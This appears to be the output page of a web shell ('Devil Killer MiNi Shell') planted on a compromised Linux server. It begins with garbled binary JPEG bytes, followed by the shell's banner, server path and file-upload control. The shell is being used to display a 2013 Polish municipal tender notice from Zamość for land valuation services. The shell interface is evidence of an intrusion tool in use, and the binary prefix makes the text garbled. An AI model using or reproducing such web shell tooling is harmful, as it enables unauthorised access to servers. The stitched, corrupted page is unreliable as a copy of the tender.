JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130712/272588-N-2013.html

<p class="kh_header"><b>Zamość: Usługa polegająca na opracowaniu operatów szacunkowych wartości      nieruchomości gruntowych położonych na terenie miasta Zamościa</b><br>
<b>Numer ogłoszenia: 272588 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na opracowaniu operatów szacunkowych wartości      nieruchomości gruntowych położonych na terenie miasta Zamościa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na opracowaniu operatów szacunkowych wartości nieruchomości gruntowych położonych na terenie miasta Zamościa.
2. Przedmiot zamówienia udzielany jest w podziale na 7 zadań:

ZADANIE NR I 
Oszacowanie wartości prawa użytkowania wieczystego nieruchomości do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla której określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej

Oszacowanie wartości prawa użytkowania wieczystego nieruchomości oznaczonej dz. nr 54/11, o pow. 151 m2, nr 54/13, o pow. 469 m2 i nr 55/9, o pow. 891 m2, w ark. nr 19, przy ul. Przemysłowej, do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla których określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej.
Uwaga - w operacie należy oszacować wartość prawa użytkowania wieczystego oddzielnie dla każdej działki. 

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania.

ZADANIE NR II 
Oszacowanie wartości prawa użytkowania wieczystego nieruchomości stanowiącej własność Skarbu Państwa, do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla której określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej

Oszacowanie wartości prawa użytkowania wieczystego nieruchomości, stanowiącej własność Skarbu Państwa, oznaczonej dz. nr 30/2, o pow. 6052 m2, nr 30/4, o pow. 1227 m2 i nr 30/5, o pow. 203 m2, w ark. nr 19, przy ul. Kilińskiego, do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla których określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej.
Uwaga - w operacie należy oszacować wartość prawa użytkowania wieczystego oddzielnie dla każdej działki. 

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania.

ZADANIE NR III
Opracowanie 3 operatów szacunkowych wartości rynkowej nieruchomości gruntowych, położonych w Zamościu, przyległych do ulicy Krasnobrodzkiej, do ustalenia opłaty adiacenckiej z tytułu wybudowania kanalizacji sanitarnej

Wykonanie 3 operatów szacunkowych wartości rynkowej nieruchomości gruntowych, oznaczonych:
w ark. 61:
- dz. nr 12/1, o pow. 299 m2,
- dz. nr 17, o pow. 4340 m2,
- dz. nr 19, o pow. 5256 m2.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania.

ZADANIE NR IV
Opracowanie operatów szacunkowych wartości rynkowej nieruchomości gruntowych, do ustalenia wysokości opłaty rocznej z tytułu użytkowania wieczystego
Wykonanie operatów szacunkowych wartości rynkowej nieruchomości gruntowych, do ustalenia wysokości opłaty rocznej z tytułu użytkowania wieczystego, oznaczonych:
- dz. nr 39/6, o pow. 90 m2, w arkuszu mapy 49, położonej przy ul. Polnej,
- dz. nr 53, o pow. 875 m2, w arkuszu mapy 51, położonej przy na Osiedlu Słoneczny Stok,
- dz. nr 92/3, o pow. 215 m2, w arkuszu mapy 20, położonej przy na Osiedlu Zakole.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania.

ZADANIE NR V
Opracowanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej, stanowiącej własność Miasta Zamość, w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego

Wykonanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej, stanowiącej własność Miasta Zamość, oznaczonej dz. nr 84/26, o pow. 4377 m2, ark. 38, przy ul. Wspólnej.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania.

ZADANIE NR VI
Opracowanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej przeznaczonej do sprzedaży celem poprawienia warunków zagospodarowania nieruchomości przyległej
Wykonanie operatu szacunkowego wartości rynkowej nieruchomości gruntowej oznaczonej w arkuszu mapy 53, numerem działki 102/2, o pow. 68 m2, położonej przy ul. Wincentego Pola, przeznaczonej do sprzedaży, celem poprawienia warunków zagospodarowania nieruchomości przyległej oznaczonej numerem działki 108/1, o pow.  717 m2.
Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania.
ZADANIE NR VII
Opracowanie dokumentacji niezbędnej do uzyskania zaświadczeń o spełnianiu wyma-gań samodzielnych lokali mieszkalnych zgodnie z dyspozycją art. 2 ustawy z dnia 24 czerwca 1994 r. o własności lokali (tekst jedn. Dz. U. z 2000 r. Nr 80, poz. 903 z późn. zm.)
Opracowanie dokumentacji dotyczącej lokalu mieszkalnego:
- nr 45, usytuowanego w budynku położonym przy ul. Polnej 7,
- nr 32, usytuowanego w budynku położonym przy ul. Poniatowskiego 15.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania.

3. Wykonawca zobowiązany jest wykonać w ramach zamówienia dokumentację fotograficzną szacowanych nieruchomości (nie dotyczy ZADANIA VII).
4.  Zamawiający dopuszcza złożenie ofert częściowych na jedną, dwie bądź więcej części zamówienia (zadań)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia                           o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający przy ocenie spełniania przez Wykonawcę warunku wiedzy                                i doświadczenia będzie brał pod uwagę wyłącznie główne usługi wykonane,                          a w przypadku świadczeń okresowych lub ciągłych, również wykonywane  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, które zostaną poparte dowodami wskazującymi, czy zostały wykonane lub są wykonywane należycie.

Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykaże się wykonaniem 
­ dla Zadań Nr I-VI - co najmniej 1 operatu szacunkowego wartości rynkowej nieruchomości gruntowych
­ dla Zadania Nr VII - co najmniej 1 dokumentacji dotyczącej lokali mieszkalnych niezbędnej do uzyskania zaświadczeń o spełnianiu wymagań samodzielnych lokali mieszkalnych zgodnie z dyspozycją  art. 2 ustawy z dnia 24 czerwca 1994 r. o własności lokali (tekst jedn. Dz. U. z 2000 r. Nr 80, poz. 903 z późn. zm.)
oraz załączy dowody określające, czy usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia                         o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) dla Zadań Nr I - VI -  Wykonawca wykaże dysponowanie osobami                        o odpowiednich uprawnieniach, tj. co najmniej 1 osobą, posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości (rzeczoznawcy majątkowego) w rozumieniu ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2010 r., Nr 102, poz. 651 z późn. zm.), która będzie uczestniczyć w wykonywaniu zamówienia
b) dla Zadania Nr VII - Wykonawca wykaże dysponowanie osobami o odpowiednich uprawnieniach, tj. co najmniej 1 osobą, która  będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia do pełnienia samodzielnej funkcji technicznej  w budownictwie - uprawnienia budowlane w specjalności architektonicznej bez ograniczeń zgodnie z § 16  Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578 ze zm.) lub uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie § 17 Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji   w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578 ze zm.) lub odpowiadające im ważne uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie, wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia                         o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli na podstawie art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go  z nimi stosunków, to Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy                         w przypadku wystąpienia okoliczności, które mogą dotyczyć m.in.:
a) Wykonawca może dokonać zmiany osób odpowiedzialnych za świadczenie usługi, przedstawionych w ofercie, jedynie za zgodą Zamawiającego, pod warunkiem,               że nowe proponowane osoby będą posiadały uprawnienia zawodowe w zakresie określonym w Specyfikacji Istotnych Warunków Zamówienia,
b) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie, mającym wpływ na realizację przedmiotu umowy,
c) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy,   w szczególności  zmiana terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (materiały przetargowe) można także uzyskać nieodpłatnie w siedzibie Zamawiającego: Urząd Miasta Zamość ul. Rynek Wielki 13, 22-400 Zamość,                     pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2013 godzina 10:00, miejsce: Oferty należy składać w pokoju nr 7 (sekretariat Prezydenta Miasta) w Urzędzie Miasta Zamość, 22-400 Zamość, Rynek Wielki 13 (Ratusz).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert nastąpi w dniu 22.07.2013r. o godz. 10:30 w siedzibie Zamawiającego         - w Urzędzie Miasta Zamość, Rynek Wielki 13, 22-400 Zamość w pokoju nr 12 (Ratusz). Osoby uprawnione do kontaktów z Wykonawcami: Marta Trych, Małgorzata Strzępek, fax (84) 639-30-54, e-mail: zamowienia@zamosc.um.gov.pl..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR I 
Oszacowanie wartości prawa użytkowania wieczystego nieruchomości do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla której określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR I 
Oszacowanie wartości prawa użytkowania wieczystego nieruchomości do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla której określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej

Oszacowanie wartości prawa użytkowania wieczystego nieruchomości oznaczonej dz. nr 54/11, o pow. 151 m2, nr 54/13, o pow. 469 m2 i nr 55/9, o pow. 891 m2, w ark. nr 19, przy ul. Przemysłowej, do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla których określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej.
Uwaga - w operacie należy oszacować wartość prawa użytkowania wieczystego oddzielnie dla każdej działki. 

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR II 
Oszacowanie wartości prawa użytkowania wieczystego nieruchomości stanowiącej własność Skarbu Państwa, do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla której określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR II 
Oszacowanie wartości prawa użytkowania wieczystego nieruchomości stanowiącej własność Skarbu Państwa, do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla której określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej

Oszacowanie wartości prawa użytkowania wieczystego nieruchomości, stanowiącej własność Skarbu Państwa, oznaczonej dz. nr 30/2, o pow. 6052 m2, nr 30/4, o pow. 1227 m2 i nr 30/5, o pow. 203 m2, w ark. nr 19, przy ul. Kilińskiego, do ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności, dla których określono wartość rynkową w celu wypowiedzenia wysokości opłaty rocznej.
Uwaga - w operacie należy oszacować wartość prawa użytkowania wieczystego oddzielnie dla każdej działki. 

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR III
Opracowanie 3 operatów szacunkowych wartości rynkowej nieruchomości gruntowych, położonych w Zamościu, przyległych do ulicy Krasnobrodzkiej, do ustalenia opłaty adiacenckiej z tytułu wybudowania kanalizacji sanitarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR III
Opracowanie 3 operatów szacunkowych wartości rynkowej nieruchomości gruntowych, położonych w Zamościu, przyległych do ulicy Krasnobrodzkiej, do ustalenia opłaty adiacenckiej z tytułu wybudowania kanalizacji sanitarnej

Wykonanie 3 operatów szacunkowych wartości rynkowej nieruchomości gruntowych, oznaczonych:
w ark. 61:
- dz. nr 12/1, o pow. 299 m2,
- dz. nr 17, o pow. 4340 m2,
- dz. nr 19, o pow. 5256 m2.

Kryterium wyboru najkorzystniejszej oferty stanowić będzie kwota, określająca koszt  wykonania całości zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR IV
Opracowanie operatów szacunkowych wartości rynkowej nieruchomości gruntowych, do ustalenia wysokości opłaty rocznej z tytułu użytkowania wieczystego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR IV
Opracowanie operatów szacunkowych wartości rynkowej nieruchomości gruntowych, do ustalenia wysokości opłaty rocznej z tytułu użytkowania wieczystego
